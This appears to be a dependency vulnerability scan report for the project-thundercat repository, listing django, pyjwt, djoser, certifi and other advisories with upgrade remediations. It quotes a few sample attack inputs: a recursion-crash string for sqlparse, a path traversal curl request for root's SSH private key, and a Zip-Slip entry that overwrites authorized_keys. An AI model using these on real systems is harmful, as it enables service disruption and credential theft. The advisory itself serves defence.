sqlparse.parse('[' * 10000 + ']' * 10000)

Remediation

Upgrade sqlparse to version 0.5.0 or higher.

References

Uncontrolled Recursion vulnerability report

high severity

Use of a Broken or Risky Cryptographic Algorithm

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.4.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

PyJWT is a Python implementation of RFC 7519.

Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm via non-blacklisted public key formats, leading to key confusion.

Remediation

Upgrade PyJWT to version 2.4.0 or higher.

References

Use of a Broken or Risky Cryptographic Algorithm vulnerability report

high severity

HTTP Header Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.22.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to HTTP Header Injection. In Python 3.9.5+ urllib.parse() automatically removes ASCII newlines and tabs from URLs. Unfortunately it created an issue in the URLValidator. URLValidator uses urllib.urlsplit() and urllib.urlunsplit() for creating a URL variant with Punycode which no longer contains newlines and tabs in Python 3.9.5+. As a consequence, the regular expression matched the URL (without unsafe characters) and the source value (with unsafe characters) was considered valid.

This issue was introduced by the bpo-43882 fix.

Remediation

Upgrade Django to version 3.2.2, 3.1.10, 2.2.22 or higher.

References

HTTP Header Injection vulnerability report

high severity

Man-in-the-Middle (MitM)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.10.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Man-in-the-Middle (MitM). An HTTP request is not redirected to HTTPS when the SECURE_PROXY_SSL_HEADER and SECURE_SSL_REDIRECT settings are used, and the proxy connects to Django via HTTPS. As such, django.http.HttpRequest.scheme has incorrect behavior when a client uses HTTP. This entails incorrect results for is_secure(), and build_absolute_uri(), and that HTTP requests would not be redirected to HTTPS in accordance with SECURE_SSL_REDIRECT.

Remediation

Upgrade Django to version 1.11.22, 2.1.10, 2.2.3 or higher.

References

Man-in-the-Middle (MitM) vulnerability report

high severity

Command Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.17.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Command Injection via certain inputs containing large sequences of nested incomplete HTML entities submitted to the strip_tags function and striptags template filter. An attacker can cause the application to consume excessive resources.

Remediation

Upgrade django to version 4.2.17, 5.0.10, 5.1.4 or higher.

References

Command Injection vulnerability report

high severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.24.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection in the FilteredRelation class when a specially crafted dictionary is used with dictionary expansion as the **kwargs passed to QuerySet.annotate or QuerySet.alias. An attacker can execute arbitrary SQL commands by supplying malicious input to these parameters.

Remediation

Upgrade Django to version 4.2.24, 5.1.12, 5.2.6 or higher.

References

SQL Injection vulnerability report

high severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.27.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection via the FilteredRelation column aliases. When a malicious dictionary expansion is passed in as the **kwargs argument to QuerySet.annotate() or QuerySet.alias() on PostgreSQL, its contents can be used to execute SQL.

Remediation

Upgrade Django to version 4.2.27, 5.1.15, 5.2.9 or higher.

References

SQL Injection vulnerability report

high severity

Authentication Bypass

Vulnerable module: djoser
Introduced through: djoser@1.5.1

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djoser@1.5.1

Remediation: Upgrade to djoser@2.3.0.

Overview

djoser is a REST implementation of Django authentication system.

Affected versions of this package are vulnerable to Authentication Bypass when the authenticate() function fails. This is because the system falls back to querying the database directly, granting access to users with valid credentials, and eventually bypassing custom authentication checks such as two-factor authentication, LDAP validations, or requirements from configured AUTHENTICATION_BACKENDS.

Remediation

Upgrade djoser to version 2.3.0 or higher.

References

Authentication Bypass vulnerability report

high severity

Reflected File Download (RFD)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Reflected File Download (RFD) as it is possible to set the Content-Disposition header of a FileResponse when the filename is derived from user-supplied input.

Remediation

Upgrade django to version 3.2.15, 4.0.7, 4.1 or higher.

References

Reflected File Download (RFD) vulnerability report

medium severity

Allocation of Resources Without Limits or Throttling

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.21.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the strip_tags() function. An attacker can cause slow performance by supplying large sequences of incomplete HTML tags.

Note: This also affects the striptags template filter which is built on top of strip_tags()

Remediation

Upgrade Django to version 4.2.21, 5.1.9, 5.2.1 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.14.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) in django.utils.translation.get_supported_language_variant() function due to improper user input validation. An attacker can exploit this vulnerability by using very long strings containing specific characters. Exploiting this vulnerability could lead to a system crash.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 4.2.14, 5.0.7 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.14.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via the in django.utils.html.urlize() and django.utils.html.urlizetrunc() functions. If certain inputs with a very large number of brackets are provided, this could lead to a system crash.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 4.2.14, 5.0.7 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via very large inputs with a specific sequence of characters in the urlize() and urlizetrunc() template filters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 4.2.15, 5.0.8 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via certain inputs with a very large number of Unicode characters in the urlize and urlizetrunc template filters, and the AdminURLFieldWidget widget.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 4.2.15, 5.0.8 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.16.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) due to not accounting for very large inputs involving intermediate ;s, in the django.utils.html.urlize() and django.utils.html.urlizetrunc() template filter functions.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 4.2.16, 5.0.9, 5.1.1 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Directory Traversal

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.14.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Directory Traversal via the derived classes of the django.core.files.storage.Storage base class which override generate_filename() without replicating the file path validations existing in the parent class. This allows potential access to out of scope data via certain inputs when calling save() method.

Note: Built-in Storage sub-classes were not affected by this vulnerability.

Details

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade django to version 4.2.14, 5.0.7 or higher.

References

Directory Traversal vulnerability report

medium severity

Improper Output Neutralization for Logs

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.22.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Improper Output Neutralization for Logs via the request.path function used by HTTP responses, which allows control characters to be written unescaped into logs. An attacker can manipulate log entries and potentially cause log injection or forgery by sending specially crafted URLs.

Remediation

Upgrade Django to version 4.2.22, 5.1.10, 5.2.2 or higher.

References

Improper Output Neutralization for Logs vulnerability report

medium severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.26.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection via the _connector argument in the QuerySet.filter, QuerySet.exclude, QuerySet.get, and Q objects. A dictionary using dictionary expansion that is supplied as the _connector value can allow attackers to execute malicious SQL.

Remediation

Upgrade Django to version 4.2.26, 5.1.14, 5.2.8 or higher.

References

SQL Injection vulnerability report

medium severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the floatformat() template filter, when given a string representation of a number in scientific notation with a large exponent.

Remediation

Upgrade django to version 4.2.15, 5.0.8 or higher.

References

Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability report

medium severity

new

Allocation of Resources Without Limits or Throttling

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.13.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Base64URL decoding process. An attacker can cause excessive CPU and memory consumption by supplying an arbitrarily large payload segment when verifying detached JWS tokens with the unencoded-payload option enabled.

Remediation

Upgrade pyjwt to version 2.13.0 or higher.

References

Allocation of Resources Without Limits or Throttling vulnerability report

medium severity

Insufficient Verification of Data Authenticity

Vulnerable module: certifi
Introduced through: certifi@2019.3.9, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › certifi@2019.3.9

Remediation: Upgrade to certifi@2022.12.7.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

Overview

Affected versions of this package are vulnerable to Insufficient Verification of Data Authenticity resulting in Certifi root certificate removal from TrustCor. The root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware.

Remediation

Upgrade certifi to version 2022.12.7 or higher.

References

Insufficient Verification of Data Authenticity vulnerability report

medium severity

Improper Check for Unusual or Exceptional Conditions

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.16.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions due to unhandled email sending failures in the django.contrib.auth.forms.PasswordResetForm class. This allows attackers to enumerate user email addresses by brute forcing password reset requests and observing the outcomes.

Remediation

Upgrade django to version 4.2.16, 5.0.9, 5.1.1 or higher.

References

Improper Check for Unusual or Exceptional Conditions vulnerability report

medium severity

Privilege Escalation

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Privilege Escalation. A Django model admin displaying inline related models, where the user has view-only permissions to a parent model but edit permissions to the inline model, would be presented with an editing UI, allowing POST requests, for updating the inline model. Directly editing the view-only parent model was not possible, but the parent model's save() method was called, triggering potential side effects, and causing pre and post-save signal handlers to be invoked.

Remediation

Upgrade Django to version 2.1.15, 2.2.8 or higher.

References

Privilege Escalation vulnerability report

medium severity

Timing Attack

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.14.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Timing Attack via the django.contrib.auth.backends.ModelBackend.authenticate() method. This allows remote attackers to enumerate users via a timing attack involving login requests for users with unusable passwords.

Remediation

Upgrade django to version 4.2.14, 5.0.7 or higher.

References

Timing Attack vulnerability report

medium severity

Cross-site Scripting (XSS)

Vulnerable module: djangorestframework
Introduced through: djangorestframework@3.9.3, django-rest-swagger@2.2.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework@3.9.3

Remediation: Upgrade to djangorestframework@3.11.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › djangorestframework@3.9.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › djangorestframework@3.9.3

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

djangorestframework is a powerful and flexible toolkit for building Web APIs.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). When using the browseable API viewer, Django REST Framework fails to properly escape certain strings that can come from user input. This allows a user who can control those strings to inject malicious <script> tags.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

